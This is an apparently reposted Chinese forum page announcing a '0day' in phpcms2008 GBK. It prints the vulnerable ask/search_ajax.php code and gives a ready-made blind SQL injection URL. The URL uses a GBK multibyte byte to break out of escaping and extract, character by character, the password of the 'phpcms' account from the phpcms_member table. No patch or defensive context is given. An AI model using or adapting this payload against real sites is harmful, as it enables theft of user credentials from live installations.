phpcms2008-0day ask/search_ajax.php

2010-1-31 07:52| 发布者: admin| 查看: 30| 评论: 0|原作者: 慕容紫英

受影响程序： phpcms2008 gbk

漏洞文件：ask/search_ajax.php

require ‘./include/common.inc.php’;
require_once MOD_ROOT.‘include/ask.class.php’;
$ask = new ask();
header(‘Content-type: text/html; charset=utf-8′);
if(strtolower(CHARSET) != ‘utf-8′) $q = iconv(CHARSET, ‘utf-8′, $q);
if($q)
{
$where = “ title LIKE ’%$q%’ AND status = 5″;
}
else
{
exit(‘null’);
}
$infos = $ask->listinfo($where, ‘askid DESC’, ”, 10);

foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, ‘’.$q.‘’, $val['title']);
$info[$key]['title'] = CHARSET != ‘utf-8′ ? iconv(CHARSET, ‘utf-8′, $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}

echo(json_encode($info));
?>

测试方法：

ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23

收藏分享邀请

		自动登录	找回密码
密码			注册

phpcms2008-0day ask/search_ajax.php

最新评论

相关分类